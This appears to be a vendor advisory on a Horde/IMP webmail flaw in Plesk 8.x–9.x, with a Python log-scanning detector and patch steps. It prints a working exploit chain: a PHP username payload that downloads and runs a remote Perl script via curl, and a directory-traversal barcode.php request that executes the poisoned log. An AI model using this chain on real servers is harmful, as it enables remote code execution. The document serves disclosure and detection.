Horde/IMP Plesk Webmail Exploit

APPLIES TO:
  • Parallels Plesk 9.3 for Linux/Unix
  • Parallels Plesk 9.2 for Linux/Unix
  • Parallels Plesk 9.0 for Linux/Unix
  • Parallels Plesk 8.6 for Linux/Unix
  • Parallels Plesk 9.3 for Windows
  • Parallels Plesk 9.2 for Windows
  • Parallels Plesk 9.0 for Windows
  • Parallels Plesk 8.6 for Windows

Symptoms

The Horde/IMP package (3.1.7-3.3.2) shipped with Plesk 8.x and with 9.x versions before 9.5.4 has a vulnerability that allows an attacker to execute arbitrary code. The attacker submits a webmail login with a POST request to the /horde/imp/redirect.php file, supplying PHP code as the username. For example:
 
<?php passthru("cd /tmp;curl -O -s http://domain.tld/new.txt;perl new.txt;rm -rf new.txt"); ?>

 
The login fails, and the PHP code is written verbatim to the /var/log/psa-horde/psa-horde.log file as part of the failed-login entry. A directory-traversal vulnerability in the type parameter of barcode.php then lets the attacker make Horde include that log file, which causes the PHP code in it to be executed, by making this request:
 
/horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log

 
Here is what the attacker's two requests look like in the web server access log, followed by the corresponding entry in the psa-horde.log file. Note the trailing %00 in the second request: it is a null byte, which older PHP builds treat as the end of the string, so anything appended to the parameter after it is ignored.
 
66.240.226.25 - - [17/Jan/2012:08:01:19 -0500] "POST /horde/imp/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"
66.240.226.25 - - [17/Jan/2012:08:01:35 -0500] " /horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log%00 HTTP/1.1" 200 13160 "1" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"
Jan 17 08:01:35 HORDE [error] [imp] FAILED LOGIN 66.240.226.25 to localhost:143[imap/notls] as <?php passthru("cd /tmp;curl -O -s http://domain.tld/new.txt;perl new.txt;rm -rf new.txt"); ?>@casanh.org [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]
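As an added detection example (not part of the original article, and not Parallels' or Horde's code), the following Python script scans web server access-log lines and psa-horde.log lines for the two indicators described above: a request to /horde/util/barcode.php whose type parameter contains directory traversal, an absolute path or a null byte, and a FAILED LOGIN entry whose username contains a PHP open tag. It also flags a barcode.php hit as "chained" when the same client address earlier POSTed to /horde/imp/redirect.php. The log lines embedded in it are constructed, modelled on the excerpt above; the benign 10.0.0.7 client, the rule names and the regular expressions are assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed sample lines, modelled on the article's excerpt (not real traffic).
ACCESS_LOG = """\
66.240.226.25 - - [17/Jan/2012:08:01:19 -0500] "POST /horde/imp/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0"
10.0.0.7 - - [17/Jan/2012:08:01:22 -0500] "GET /horde/util/barcode.php?type=code128&barcode=ABC HTTP/1.1" 200 812 "-" "Mozilla/5.0"
66.240.226.25 - - [17/Jan/2012:08:01:35 -0500] "GET /horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log%00 HTTP/1.1" 200 13160 "1" "Mozilla/5.0"
"""

HORDE_LOG = """\
Jan 17 08:01:35 HORDE [error] [imp] FAILED LOGIN 66.240.226.25 to localhost:143[imap/notls] as <?php passthru("cd /tmp;curl -O -s http://domain.tld/new.txt;perl new.txt;rm -rf new.txt"); ?>@casanh.org [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]
Jan 17 08:02:01 HORDE [error] [imp] FAILED LOGIN 10.0.0.7 to localhost:143[imap/notls] as bob@casanh.org [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]
"""

# Combined-format access log. The method is optional so that a line whose
# method was lost (as in the article's excerpt) still parses.
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"\s*(?:(?P<method>[A-Z]+) )?(?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# psa-horde.log failed-login entry; the username is everything before the
# final "@domain" that precedes "[on line".
HORDE_RE = re.compile(
    r'^(?P<ts>\w{3} +\d+ [\d:]+) HORDE \[error\] \[imp\] FAILED LOGIN (?P<ip>\S+) '
    r'to \S+ as (?P<user>.*?)@\S+ \[on line'
)

TRAVERSAL_RE = re.compile(r'(^|/)\.\.(/|$)')
PHP_TAG_RE = re.compile(r'<\?(php|=)?', re.IGNORECASE)


def parse_access(line):
    """Split an access-log line into fields plus a decoded query dict."""
    m = ACCESS_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    path, _, query = rec["target"].partition("?")
    rec["path"] = path
    # parse_qs percent-decodes values, so %00 becomes a real NUL byte here.
    rec["query"] = parse_qs(query, keep_blank_values=True)
    return rec


def check_barcode_lfi(rec):
    """Flag barcode.php requests whose type parameter is not a plain name."""
    if rec is None or rec["path"] != "/horde/util/barcode.php":
        return None
    for val in rec["query"].get("type", []):
        if TRAVERSAL_RE.search(val) or "\x00" in val or val.startswith("/"):
            return {"rule": "horde-barcode-lfi", "ip": rec["ip"],
                    "ts": rec["ts"], "type": val}
    return None


def check_php_login(line):
    """Flag failed-login entries whose username carries a PHP open tag."""
    m = HORDE_RE.match(line)
    if m is None or not PHP_TAG_RE.search(m.group("user")):
        return None
    return {"rule": "horde-php-in-login", "ip": m.group("ip"),
            "ts": m.group("ts"), "user": m.group("user")}


def analyze(access_log, horde_log):
    """Run both rules and correlate barcode.php hits with prior redirect.php POSTs."""
    findings = []
    posted_redirect = set()
    for line in access_log.splitlines():
        rec = parse_access(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"] == "/horde/imp/redirect.php":
            posted_redirect.add(rec["ip"])
        hit = check_barcode_lfi(rec)
        if hit:
            hit["chained"] = rec["ip"] in posted_redirect
            findings.append(hit)
    for line in horde_log.splitlines():
        hit = check_php_login(line)
        if hit:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in analyze(ACCESS_LOG, HORDE_LOG):
        print(f)
```

Run against real files by reading the access log and /var/log/psa-horde/psa-horde.log into the two string arguments; the traversal check is deliberately applied to the decoded value so that double-encoded or mixed-case escapes of `../` are still caught once the server has decoded them.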

Resolution

Download the patch for Horde 3.1.7-3.3.2 that matches the platform your server runs on, unzip it, and place the file in the corresponding folder:

Linux:
/usr/share/psa-horde/lib/Horde/  - [ patch ]

Windows:
%plesk_vhosts%\webmail\horde\lib\Horde\ - [ patch ]


Attachments:


f1ea5d9407b679b92bed375cb9324c65 c81e59b61af9dca603ba03b14aabe968 42844a8183c58f5bd71c7d59929707e6 3e2cae805d7531c06d01f2df5398114f e8cbf2a9b109849cd9de80cfc0e0582d db229c4740d60cf9f63ce5e5f42872fc 6247aaf63a64298429d85623a734b5dd 22d986bd49b9a6e1ba95956db2a14466 096219f1ba3f9ed7b5fcb848354b8215 9f8baf78266b4e54525d1c6bf06305a5 12c6f6bd6775cb701defb57d79fe96f6 5b3062eb55e955d8ca8051339fb09f69 7f4fd8df3573236a1cfaa861f2289640 bdfc2fcfd33015dce037e3597d1fb50c 8d9286f5cc87aae919f2a1703e913854 56797cefb1efc9130f7c48a7d1db0f0c
